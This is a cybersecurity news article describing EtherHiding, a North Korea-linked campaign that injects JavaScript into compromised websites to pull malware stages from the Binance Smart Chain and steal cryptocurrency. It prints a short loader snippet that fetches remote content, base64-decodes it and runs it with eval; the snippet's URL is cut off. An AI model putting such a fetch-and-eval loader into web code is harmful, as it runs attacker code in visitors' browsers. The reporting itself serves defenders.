In recent months, a sophisticated malware campaign—dubbed EtherHiding—has emerged from North Korea-aligned threat actors, sharply escalating the cybersecurity risks facing cryptocurrency exchanges and their users worldwide.
The campaign surfaced in the wake of heightened regulatory crackdowns on illicit crypto transactions, with attackers shifting tactics to exploit new digital supply chain vulnerabilities.
EtherHiding first appeared in targeted phishing campaigns, but has since evolved into a multi-stage threat, marked by its use of decentralized blockchain technologies to distribute and update malicious payloads stealthily.
The signature tactic distinguishing EtherHiding lies in its exploitation of the Binance Smart Chain (BSC) to host intermediary scripts, thereby circumventing traditional security controls and enabling the campaign to persist even after domains or hosting providers are taken down.
Attackers compromise legitimate or semi-legitimate websites, injecting code that reaches out to blockchain-stored content to fetch the latest stage of malware.
This modular approach grants the operators a high degree of agility, allowing on-the-fly updates to malicious scripts and reducing the effectiveness of traditional blocklists or take-down requests.
Google Cloud researchers identified and documented EtherHiding’s operation, highlighting its innovative use of cryptographic anonymity provided by blockchain networks, making forensic tracking and operational disruption significantly more challenging for defenders.
The impact of EtherHiding has been severe, enabling not only the theft of digital assets but also establishing persistent access to infected systems for further espionage or ransomware activity.
As the campaign evolved, it began to target browser extensions, hot wallets, and even popular DeFi platforms, broadening the spectrum of potential victims.
The campaign’s ability to iterate and redeploy new infection chains has frustrated enterprise defenders, with many legacy endpoint security solutions failing to keep pace with the dynamic delivery infrastructure leveraged by North Korean operators.
UNC5342 EtherHiding on BNB Smart Chain and Ethereum (Source – Google Cloud)
Cryptocurrency platforms are under renewed pressure to audit their web and cloud assets, as even a minor misconfiguration can open pathways for EtherHiding’s injection and subsequent exploitation.
Infection Mechanism and JavaScript Payloads
The infection chain typically begins with JavaScript injected into vulnerable web properties. This script silently loads additional code from the Binance Smart Chain using unique transaction identifiers.
The payload mechanism relies on obfuscation and multi-layer encoding, making static detection increasingly difficult.
For instance, base64-encoded loader scripts are fetched and then executed within the browser context, occasionally using iframes or manipulated event handlers to deliver the next stage payload.
A representative code snippet demonstrates the loader’s logic:-
fetch(‘
.then(response => response.json())
.then(data => {
let scriptContent = atob(data.result);
eval(scriptContent);
});
Such tactics not only obscure the origin of the malicious payload but also enable rapid code updates.
As detection mechanisms adapt, EtherHiding operators push new payloads to the blockchain, decoupling the infection infrastructure from easy takedown and providing a resilient attack platform for ongoing theft and intrusion operations.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post North Korean Hackers Using EtherHiding to Deliver Malware and Steal Cryptocurrency appeared first on Cyber Security News.
